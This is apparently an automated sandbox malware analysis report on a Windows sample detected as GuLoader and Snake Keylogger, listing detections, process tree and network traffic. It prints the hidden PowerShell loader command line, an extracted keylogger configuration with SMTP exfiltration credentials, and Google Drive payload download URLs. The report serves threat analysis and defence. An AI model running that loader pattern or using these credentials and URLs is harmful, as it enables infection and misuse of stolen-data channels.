Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ln5S7fIBkY.exe

Overview

General Information

Sample name:ln5S7fIBkY.exe
renamed because original name is a hash value
Original sample name:4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853.exe
Analysis ID:1587628
MD5:e38257f3eaa78e2dca3c3063b05eaa70
SHA1:250d9151f64818a8bfa51d3714a6ddb214303495
SHA256:4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • ln5S7fIBkY.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\ln5S7fIBkY.exe" MD5: E38257F3EAA78E2DCA3C3063B05EAA70)
    • powershell.exe (PID: 3348 cmdline: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5400 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "administracion@teyvi.es", "Password": "jrpM0Y5k", "Host": "smtp.securemail.pro", "Port": "587", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000002.00000002.2353301520.000000000C110000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 5400JoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 172.217.16.206, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5400, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49861
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)", CommandLine: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ln5S7fIBkY.exe", ParentImage: C:\Users\user\Desktop\ln5S7fIBkY.exe, ParentProcessId: 7100, ParentProcessName: ln5S7fIBkY.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)", ProcessId: 3348, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T16:02:47.164708+010028033053Unknown Traffic192.168.2.949915104.21.112.1443TCP
          2025-01-10T16:02:48.406269+010028033053Unknown Traffic192.168.2.949924104.21.112.1443TCP
          2025-01-10T16:02:49.686592+010028033053Unknown Traffic192.168.2.949933104.21.112.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T16:02:44.961622+010028032742Potentially Bad Traffic192.168.2.949897193.122.6.16880TCP
          2025-01-10T16:02:46.586583+010028032742Potentially Bad Traffic192.168.2.949897193.122.6.16880TCP
          2025-01-10T16:02:47.867821+010028032742Potentially Bad Traffic192.168.2.949921193.122.6.16880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T16:02:40.162656+010028032702Potentially Bad Traffic192.168.2.949861172.217.16.206443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: ln5S7fIBkY.exeAvira: detected
          Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exeAvira: detection malicious, Label: TR/Injector.ekjwr
          Source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "administracion@teyvi.es", "Password": "jrpM0Y5k", "Host": "smtp.securemail.pro", "Port": "587", "Version": "5.1"}
          Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exeVirustotal: Detection: 68%Perma Link
          Source: ln5S7fIBkY.exeVirustotal: Detection: 68%Perma Link
          Source: ln5S7fIBkY.exeReversingLabs: Detection: 62%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27489350 CryptUnprotectData,7_2_27489350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27489999 CryptUnprotectData,7_2_27489999
          Source: ln5S7fIBkY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49909 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.9:49861 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49871 version: TLS 1.2
          Source: ln5S7fIBkY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb$ source: powershell.exe, 00000002.00000002.2352305297.0000000008D6D000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 006BF1F6h7_2_006BF007
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 006BFB80h7_2_006BF007
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_006BE528
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_006BEB5B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_006BED3C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27451A38h7_2_27451620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27451471h7_2_274511C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 274502F1h7_2_27450040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745E301h7_2_2745E058
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745D5F9h7_2_2745D350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745DA51h7_2_2745D7A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745C8F1h7_2_2745C648
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745FD11h7_2_2745FA68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745F8B9h7_2_2745F610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27451A38h7_2_27451610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745D1A1h7_2_2745CEF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745CD49h7_2_2745CAA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745BBE9h7_2_2745B940
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27451A38h7_2_27451966
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745F009h7_2_2745ED60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27451011h7_2_27450D60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27450BB1h7_2_27450900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745EBB1h7_2_2745E908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745C499h7_2_2745C1F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745C041h7_2_2745BD98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745F461h7_2_2745F1B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745DEA9h7_2_2745DC00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745B791h7_2_2745B4E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27450751h7_2_274504A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2745E759h7_2_2745E4B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27488945h7_2_27488608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27486A21h7_2_27486778
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 274865C9h7_2_27486320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27486E79h7_2_27486BD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_274833A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_274833B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27485D19h7_2_27485A70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 274858C1h7_2_27485618
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27486171h7_2_27485EC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_274836CE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27480FF1h7_2_27480D48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27488001h7_2_27487D58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27487BA9h7_2_27487900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27485441h7_2_27485198
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27488459h7_2_274881B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 274802E9h7_2_27480040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 274872FAh7_2_27487050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27480B99h7_2_274808F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27480741h7_2_27480498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 27487751h7_2_274874A8
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49921 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49897 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49915 -> 104.21.112.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49933 -> 104.21.112.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49924 -> 104.21.112.1:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49861 -> 172.217.16.206:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49909 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.000000002469E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: ln5S7fIBkY.exe, 00000000.00000000.1510063030.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ln5S7fIBkY.exe, 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000246C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: powershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/3
          Source: msiexec.exe, 00000007.00000002.2760493798.0000000008DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg
          Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download
          Source: msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=downloadl
          Source: powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
